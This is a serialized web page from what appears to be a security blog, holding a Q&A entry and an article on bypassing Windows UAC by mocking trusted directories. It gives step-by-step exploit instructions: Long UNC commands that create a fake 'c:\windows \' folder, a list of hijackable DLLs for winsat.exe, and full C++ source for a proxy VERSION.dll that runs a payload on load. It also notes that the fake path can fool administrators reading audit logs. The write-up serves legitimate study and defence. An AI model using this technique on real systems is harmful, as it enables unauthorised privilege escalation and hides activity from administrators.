[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fLVUMP_TCJxmnonVofz8gev9B8d_E0NlSFbljJXwFqSw":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":52,"createdAt":53,"_status":51},619,"How does the Long UNC path technique help in bypassing UAC by mocking trusted directories?","The Long UNC path technique allows an attacker to create a folder with spaces or dots appended, such as `\\\\?\\C:\\Windows \\`, which the system interprets as a separate directory. By placing an auto-elevating executable like `winsat.exe` inside this fake folder (e.g., `c:\\windows \\system32\\winsat.exe`), the program runs from a path that looks like `c:\\windows\\system32`, satisfying the trusted directory requirement for UAC bypass. This method is detailed in the original [Analysis of UAC Bypass Exploitation by Mocking Trusted Directories](\u002Fnews\u002Fanalysis-of-uac-bypass-exploitation-by-mocking-trusted-directories).","\u003Cp>The Long UNC path technique allows an attacker to create a folder with spaces or dots appended, such as `\\\\?\\C:\\Windows \\`, which the system interprets as a separate directory. By placing an auto-elevating executable like `winsat.exe` inside this fake folder (e.g., `c:\\windows \\system32\\winsat.exe`), the program runs from a path that looks like `c:\\windows\\system32`, satisfying the trusted directory requirement for UAC bypass. This method is detailed in the original [Analysis of UAC Bypass Exploitation by Mocking Trusted Directories](\u002Fnews\u002Fanalysis-of-uac-bypass-exploitation-by-mocking-trusted-directories).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fanalysis-of-uac-bypass-exploitation-by-mocking-trusted-directories\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-does-the-long-unc-path-technique-help-in-bypassing-uac-by-mocking-trusted-di-1777482502589","Long UNC, UAC bypass, trusted directories, auto-elevate, DLL hijacking",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":48,"updatedAt":49,"createdAt":50,"_status":51},153,"Analysis of UAC Bypass Exploitation by Mocking Trusted Directories","analysis-of-uac-bypass-exploitation-by-mocking-trusted-directories","Learn how to bypass UAC by mocking trusted directories using Long UNC and DLL hijacking. Exploit analysis with winsat.exe and payload implementation.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>A technique learned from @CE2Wells' blog: bypassing UAC by mocking trusted directories. This article will introduce this method based on personal experience, add my own insights, and share details from testing.\u003C\u002Fp>\u003Cp>Article link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fmedium.com\u002Ftenable-techblog\u002Fuac-bypass-by-mocking-trusted-directories-24a96675f6e\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cul>\u003Cli>Principle Overview\u003C\u002Fli>\u003Cli>Implementation Details\u003C\u002Fli>\u003Cli>Practical Testing\u003C\u002Fli>\u003Cli>Exploitation Analysis\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Principle Overview\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Long UNC\u003C\u002Fh3>\u003Cp>In a previous article titled 'Catalog Signature Forgery – Long UNC Filename Spoofing', it was mentioned that using Long UNC for exe files can deceive the system into recognizing it as another file.\u003C\u002Fp>\u003Cp>For example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>type putty.exe &gt; \"\\\\?\\C:\\Windows\\System32\\calc.exe \"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017311822_0_db3ac88cf0.jpeg\">\u003C\u002Fp>\u003Cp>This method also applies to folders.\u003C\u002Fp>\u003Cp>For example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>md \"\\\\?\\c:\\windows \"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The newly created folder can deceive the system into recognizing it as another folder.\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017348018_1_897923f2b9.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017385947_2_184f78f5d6.jpeg\">\u003C\u002Fp>\u003Ch3>2. Files that can bypass UAC by default\u003C\u002Fh3>\u003Cp>Must meet the following three conditions:\u003C\u002Fp>\u003Cul>\u003Cli>The program is configured to automatically elevate privileges and execute with administrator permissions.\u003C\u002Fli>\u003Cli>Program contains signature\u003C\u002Fli>\u003Cli>Executed from trusted directory (\"c:\\windows\\system32\")\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>3. Regular user permissions can create folders in disk root directory\u003C\u002Fh3>\u003Cp>For example, regular user permissions can create folders under C drive\u003C\u002Fp>\u003Ch3>4. DLL hijacking\u003C\u002Fh3>\u003Cp>If an exe program needs to load DLLs during startup, it first searches the same directory as the exe by default\u003C\u002Fp>\u003Cp>In summary, all conditions for bypassing UAC are met\u003C\u002Fp>\u003Cp>Implementation approach is as follows:\u003C\u002Fp>\u003Col>\u003Cli>Find a file that can bypass UAC by default, such as c:\\windows\\system32\\winsat.exe\u003C\u002Fli>\u003Cli>Use Long UNC to create a special folder \"c:\\windows \\\" and copy winsat.exe to this directory\u003C\u002Fli>\u003Cli>Execute winsat.exe, record the startup process, and discover it needs to load WINMM.dll from the same directory during startup\u003C\u002Fli>\u003Cli>Write payload.dll, specify export functions identical to c:\\windows\\system32\\winmm.dll, and name it \"c:\\windows \\system32\\WINMM.dll\"\u003C\u002Fli>\u003Cli>Execute \"c:\\windows \\system32\\winsat.exe\", which will automatically bypass UAC, load \"c:\\windows \\system32\\WINMM.dll\", and execute the payload\u003C\u002Fli>\u003C\u002Fol>\u003Ch2>0x03 Implementation Details\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Find exploitable exe files\u003C\u002Fh3>\u003Cp>One characteristic of these files is that the autoElevate attribute in the manifest is true\u003C\u002Fp>\u003Cp>Automated search can be achieved using PowerShell, reference tool:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fg3rzi\u002FManifesto\u003C\u002Fp>\u003Cp>The GUI tool usage is shown in the following image\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017410440_3_37fb366c50.jpeg\">\u003C\u002Fp>\u003Ch3>2. Use Long UNC to create a special folder \"c:\\windows \\\"\u003C\u002Fh3>\u003Cp>C++ implementation code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>CreateDirectoryW(L\"\\\\\\\\?\\\\C:\\\\Windows \\\\\", 0);\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The command implemented via command line is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>md \"\\\\?\\c:\\windows \"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>3. Record the startup process of winsat.exe, looking for dlls loaded during startup\u003C\u002Fh3>\u003Cp>Here you can use Process Monitor, filter for records with result \"NAME NOT FOUND\" during startup, as shown in the following image\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017459487_4_ee456e757b.jpeg\">\u003C\u002Fp>\u003Cp>Therefore, the exploitable dll names are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>VERSION.dll\u003C\u002Fli>\u003Cli>WINMM.dll\u003C\u002Fli>\u003Cli>POWRPROF.dll\u003C\u002Fli>\u003Cli>dxgi.dll\u003C\u002Fli>\u003Cli>dwmapi.dll\u003C\u002Fli>\u003Cli>d3d10_1.dll\u003C\u002Fli>\u003Cli>d3d11core.dll\u003C\u002Fli>\u003Cli>d3d11.dll\u003C\u002Fli>\u003Cli>d3d10core.dll\u003C\u002Fli>\u003Cli>QUARTZ.dll\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Choose any one\u003C\u002Fp>\u003Ch3>4. Write payload.dll, specify export functions\u003C\u002Fh3>\u003Cp>exportstoc can be used here, download address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fmichaellandi\u002Fexportstoc\u003C\u002Fp>\u003Cp>For detailed usage instructions, refer to the previous article \"Study Notes Weekly No.1(Monitor WMI &amp; ExportsToC++ &amp; Use DiskCleanup bypass UAC)\"\u003C\u002Fp>\u003Cp>For example, here we select VERSION.dll, the original DLL path to hijack is c:\\\\Windows\\\\system32\\\\version.dll, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017475968_5_bdf48a2977.jpeg\">\u003C\u002Fp>\u003Cp>Add payload to launch calculator, the final code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>#include \"stdafx.h\"\u003Cbr>#include \u003Ciostream>\u003Cbr>#include \u003Cwindows.h>\u003Cbr>\u003Cbr>using namespace std;\u003Cbr>\u003Cbr>#pragma comment (linker, \"\u002Fexport:GetFileVersionInfoA=c:\\\\windows\\\\system32\\\\version.GetFileVersionInfoA,@1\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:GetFileVersionInfoByHandle=c:\\\\windows\\\\system32\\\\version.GetFileVersionInfoByHandle,@2\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:GetFileVersionInfoExW=c:\\\\windows\\\\system32\\\\version.GetFileVersionInfoExW,@3\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:GetFileVersionInfoSizeA=c:\\\\windows\\\\system32\\\\version.GetFileVersionInfoSizeA,@4\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:GetFileVersionInfoSizeExW=c:\\\\windows\\\\system32\\\\version.GetFileVersionInfoSizeExW,@5\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:GetFileVersionInfoSizeW=c:\\\\windows\\\\system32\\\\version.GetFileVersionInfoSizeW,@6\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:GetFileVersionInfoW=c:\\\\windows\\\\system32\\\\version.GetFileVersionInfoW,@7\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:VerFindFileA=c:\\\\windows\\\\system32\\\\version.VerFindFileA,@8\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:VerFindFileW=c:\\\\windows\\\\system32\\\\version.VerFindFileW,@9\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:VerInstallFileA=c:\\\\windows\\\\system32\\\\version.VerInstallFileA,@10\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:VerInstallFileW=c:\\\\windows\\\\system32\\\\version.VerInstallFileW,@11\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:VerLanguageNameA=c:\\\\windows\\\\system32\\\\version.VerLanguageNameA,@12\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:VerLanguageNameW=c:\\\\windows\\\\system32\\\\version.VerLanguageNameW,@13\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:VerQueryValueA=c:\\\\windows\\\\system32\\\\version.VerQueryValueA,@14\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:VerQueryValueW=c:\\\\windows\\\\system32\\\\version.VerQueryValueW,@15\")\u003Cbr>\u003Cbr>BOOL WINAPI DllMain(HINSTANCE hInst,DWORD reason,LPVOID)\u003Cbr>{\u003Cbr>\tsystem(\"start calc.exe\");\u003Cbr>\treturn true;\u003Cbr>}\u003C\u002Fwindows.h>\u003C\u002Fiostream>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Compile it into a DLL and save it as \"c:\\windows\\system32\\VERSION.dll\".\u003C\u002Fp>\u003Ch3>5. Launch the executable\u003C\u002Fh3>\u003Cp>To launch from the command line, use the absolute path: \"c:\\windows\\system32\\winsat.exe\"\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Short filenames (obtained via \"dir \u002Fx\") cannot be used here\u003C\u002Fp>\u003Ch2>0x04 Exploitation Analysis\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>1. Multiple exploitable locations exist\u003C\u002Fp>\u003Cp>In my test system (Win7 x64), there are 39 exploitable exe files, and many exploitable dll files as well\u003C\u002Fp>\u003Cp>2. There are other forms for Long UNC folders\u003C\u002Fp>\u003Cp>For example:\u003C\u002Fp>\u003Cul>\u003Cli>Filenames can contain multiple spaces: \"\\\\?\\C:\\Windows    \"\u003C\u002Fli>\u003Cli>Using the character \".\" (at least two): \"\\\\?\\C:\\Windows..\"\u003C\u002Fli>\u003C\u002Ful>\u003Cp>However, other forms of folders cannot be used to bypass UAC\u003C\u002Fp>\u003Cp>3. Creating forged folders using Long UNC can deceive \"careless administrators\"\u003C\u002Fp>\u003Cp>For example, if the system has Windows command line process auditing enabled, recording program execution parameters\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017486520_6_5c05e11e6d.jpeg\">\u003C\u002Fp>\u003Cp>It is difficult to distinguish with the naked eye\u003C\u002Fp>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article analyzes the method of bypassing UAC by simulating trusted directories and shares details from the testing process\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>A technique learned from @CE2Wells' blog: bypassing UAC by mocking trusted directories. This article will introduce this method based on personal experience, add my own insights, and share details from testing.\u003C\u002Fp>\u003Cp>Article link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fmedium.com\u002Ftenable-techblog\u002Fuac-bypass-by-mocking-trusted-directories-24a96675f6e\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cul>\u003Cli>Principle Overview\u003C\u002Fli>\u003Cli>Implementation Details\u003C\u002Fli>\u003Cli>Practical Testing\u003C\u002Fli>\u003Cli>Exploitation Analysis\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Principle Overview\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Long UNC\u003C\u002Fh3>\u003Cp>In a previous article titled 'Catalog Signature Forgery – Long UNC Filename Spoofing', it was mentioned that using Long UNC for exe files can deceive the system into recognizing it as another file.\u003C\u002Fp>\u003Cp>For example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>type putty.exe &gt; \"\\\\?\\C:\\Windows\\System32\\calc.exe \"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017311822_0_db3ac88cf0-1.jpeg\">\u003C\u002Fp>\u003Cp>This method also applies to folders.\u003C\u002Fp>\u003Cp>For example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>md \"\\\\?\\c:\\windows \"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The newly created folder can deceive the system into recognizing it as another folder.\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017348018_1_897923f2b9-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017385947_2_184f78f5d6-1.jpeg\">\u003C\u002Fp>\u003Ch3>2. Files that can bypass UAC by default\u003C\u002Fh3>\u003Cp>Must meet the following three conditions:\u003C\u002Fp>\u003Cul>\u003Cli>The program is configured to automatically elevate privileges and execute with administrator permissions.\u003C\u002Fli>\u003Cli>Program contains signature\u003C\u002Fli>\u003Cli>Executed from trusted directory (\"c:\\windows\\system32\")\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>3. Regular user permissions can create folders in disk root directory\u003C\u002Fh3>\u003Cp>For example, regular user permissions can create folders under C drive\u003C\u002Fp>\u003Ch3>4. DLL hijacking\u003C\u002Fh3>\u003Cp>If an exe program needs to load DLLs during startup, it first searches the same directory as the exe by default\u003C\u002Fp>\u003Cp>In summary, all conditions for bypassing UAC are met\u003C\u002Fp>\u003Cp>Implementation approach is as follows:\u003C\u002Fp>\u003Col>\u003Cli>Find a file that can bypass UAC by default, such as c:\\windows\\system32\\winsat.exe\u003C\u002Fli>\u003Cli>Use Long UNC to create a special folder \"c:\\windows \\\" and copy winsat.exe to this directory\u003C\u002Fli>\u003Cli>Execute winsat.exe, record the startup process, and discover it needs to load WINMM.dll from the same directory during startup\u003C\u002Fli>\u003Cli>Write payload.dll, specify export functions identical to c:\\windows\\system32\\winmm.dll, and name it \"c:\\windows \\system32\\WINMM.dll\"\u003C\u002Fli>\u003Cli>Execute \"c:\\windows \\system32\\winsat.exe\", which will automatically bypass UAC, load \"c:\\windows \\system32\\WINMM.dll\", and execute the payload\u003C\u002Fli>\u003C\u002Fol>\u003Ch2>0x03 Implementation Details\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Find exploitable exe files\u003C\u002Fh3>\u003Cp>One characteristic of these files is that the autoElevate attribute in the manifest is true\u003C\u002Fp>\u003Cp>Automated search can be achieved using PowerShell, reference tool:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fg3rzi\u002FManifesto\u003C\u002Fp>\u003Cp>The GUI tool usage is shown in the following image\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017410440_3_37fb366c50-1.jpeg\">\u003C\u002Fp>\u003Ch3>2. Use Long UNC to create a special folder \"c:\\windows \\\"\u003C\u002Fh3>\u003Cp>C++ implementation code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>CreateDirectoryW(L\"\\\\\\\\?\\\\C:\\\\Windows \\\\\", 0);\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The command implemented via command line is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>md \"\\\\?\\c:\\windows \"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>3. Record the startup process of winsat.exe, looking for dlls loaded during startup\u003C\u002Fh3>\u003Cp>Here you can use Process Monitor, filter for records with result \"NAME NOT FOUND\" during startup, as shown in the following image\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017459487_4_ee456e757b-1.jpeg\">\u003C\u002Fp>\u003Cp>Therefore, the exploitable dll names are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>VERSION.dll\u003C\u002Fli>\u003Cli>WINMM.dll\u003C\u002Fli>\u003Cli>POWRPROF.dll\u003C\u002Fli>\u003Cli>dxgi.dll\u003C\u002Fli>\u003Cli>dwmapi.dll\u003C\u002Fli>\u003Cli>d3d10_1.dll\u003C\u002Fli>\u003Cli>d3d11core.dll\u003C\u002Fli>\u003Cli>d3d11.dll\u003C\u002Fli>\u003Cli>d3d10core.dll\u003C\u002Fli>\u003Cli>QUARTZ.dll\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Choose any one\u003C\u002Fp>\u003Ch3>4. Write payload.dll, specify export functions\u003C\u002Fh3>\u003Cp>exportstoc can be used here, download address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fmichaellandi\u002Fexportstoc\u003C\u002Fp>\u003Cp>For detailed usage instructions, refer to the previous article \"Study Notes Weekly No.1(Monitor WMI &amp; ExportsToC++ &amp; Use DiskCleanup bypass UAC)\"\u003C\u002Fp>\u003Cp>For example, here we select VERSION.dll, the original DLL path to hijack is c:\\\\Windows\\\\system32\\\\version.dll, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017475968_5_bdf48a2977-1.jpeg\">\u003C\u002Fp>\u003Cp>Add payload to launch calculator, the final code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>#include \"stdafx.h\"\u003Cbr>#include \u003Ciostream>\u003Cbr>#include \u003Cwindows.h>\u003Cbr>\u003Cbr>using namespace std;\u003Cbr>\u003Cbr>#pragma comment (linker, \"\u002Fexport:GetFileVersionInfoA=c:\\\\windows\\\\system32\\\\version.GetFileVersionInfoA,@1\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:GetFileVersionInfoByHandle=c:\\\\windows\\\\system32\\\\version.GetFileVersionInfoByHandle,@2\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:GetFileVersionInfoExW=c:\\\\windows\\\\system32\\\\version.GetFileVersionInfoExW,@3\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:GetFileVersionInfoSizeA=c:\\\\windows\\\\system32\\\\version.GetFileVersionInfoSizeA,@4\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:GetFileVersionInfoSizeExW=c:\\\\windows\\\\system32\\\\version.GetFileVersionInfoSizeExW,@5\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:GetFileVersionInfoSizeW=c:\\\\windows\\\\system32\\\\version.GetFileVersionInfoSizeW,@6\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:GetFileVersionInfoW=c:\\\\windows\\\\system32\\\\version.GetFileVersionInfoW,@7\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:VerFindFileA=c:\\\\windows\\\\system32\\\\version.VerFindFileA,@8\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:VerFindFileW=c:\\\\windows\\\\system32\\\\version.VerFindFileW,@9\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:VerInstallFileA=c:\\\\windows\\\\system32\\\\version.VerInstallFileA,@10\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:VerInstallFileW=c:\\\\windows\\\\system32\\\\version.VerInstallFileW,@11\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:VerLanguageNameA=c:\\\\windows\\\\system32\\\\version.VerLanguageNameA,@12\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:VerLanguageNameW=c:\\\\windows\\\\system32\\\\version.VerLanguageNameW,@13\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:VerQueryValueA=c:\\\\windows\\\\system32\\\\version.VerQueryValueA,@14\")\u003Cbr>#pragma comment (linker, \"\u002Fexport:VerQueryValueW=c:\\\\windows\\\\system32\\\\version.VerQueryValueW,@15\")\u003Cbr>\u003Cbr>BOOL WINAPI DllMain(HINSTANCE hInst,DWORD reason,LPVOID)\u003Cbr>{\u003Cbr>\tsystem(\"start calc.exe\");\u003Cbr>\treturn true;\u003Cbr>}\u003C\u002Fwindows.h>\u003C\u002Fiostream>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Compile it into a DLL and save it as \"c:\\windows\\system32\\VERSION.dll\".\u003C\u002Fp>\u003Ch3>5. Launch the executable\u003C\u002Fh3>\u003Cp>To launch from the command line, use the absolute path: \"c:\\windows\\system32\\winsat.exe\"\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Short filenames (obtained via \"dir \u002Fx\") cannot be used here\u003C\u002Fp>\u003Ch2>0x04 Exploitation Analysis\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>1. Multiple exploitable locations exist\u003C\u002Fp>\u003Cp>In my test system (Win7 x64), there are 39 exploitable exe files, and many exploitable dll files as well\u003C\u002Fp>\u003Cp>2. There are other forms for Long UNC folders\u003C\u002Fp>\u003Cp>For example:\u003C\u002Fp>\u003Cul>\u003Cli>Filenames can contain multiple spaces: \"\\\\?\\C:\\Windows    \"\u003C\u002Fli>\u003Cli>Using the character \".\" (at least two): \"\\\\?\\C:\\Windows..\"\u003C\u002Fli>\u003C\u002Ful>\u003Cp>However, other forms of folders cannot be used to bypass UAC\u003C\u002Fp>\u003Cp>3. Creating forged folders using Long UNC can deceive \"careless administrators\"\u003C\u002Fp>\u003Cp>For example, if the system has Windows command line process auditing enabled, recording program execution parameters\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017486520_6_5c05e11e6d-1.jpeg\">\u003C\u002Fp>\u003Cp>It is difficult to distinguish with the naked eye\u003C\u002Fp>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article analyzes the method of bypassing UAC by simulating trusted directories and shares details from the testing process\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",899,"Onedaysec",4,"published","2026-02-02T07:38:21.454Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"UAC Bypass via Mocking Trusted Directories: Exploitation Analysis","UAC bypass, mocking trusted directories, Long UNC, DLL hijacking, Windows security, privilege escalation, winsat.exe, exploit analysis",null,false,[],{"docs":43,"hasNextPage":40},[44,45,46,47,4],623,622,621,620,{"title":39,"description":39,"image":39},"2026-07-24T15:37:12.321Z","2026-07-23T16:01:50.957Z","draft","2026-07-23T16:13:48.585Z","2026-07-23T16:13:48.584Z"]